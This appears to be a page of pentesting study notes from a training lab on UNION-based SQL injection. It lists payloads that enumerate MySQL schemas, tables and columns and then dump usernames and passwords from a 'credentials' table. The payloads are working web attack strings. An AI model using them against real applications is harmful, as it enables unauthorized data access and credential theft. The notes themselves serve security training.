Database Enumeration

mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
6 rows in set (0.01 sec)
# show all database above
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- 
# show using database
cn' UNION select 1,database(),2,3--
# show target database tables with using INFORMATION_SCHEMA.TABLES
cn'
UNION
select 1,TABLE_NAME,TABLE_SCHEMA,4
from INFORMATION_SCHEMA.TABLES
where table_schema='dev'-- 
# show target tables columns with using INFORMATION_SCHEMA.COLUMNS
cn'
UNION
select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA
from INFORMATION_SCHEMA.COLUMNS
where table_name='credentials'-- 
cn' UNION select 1,username,password,4 from dev.credentials--
PreviousUnion InjectionNextReading Files

Last updated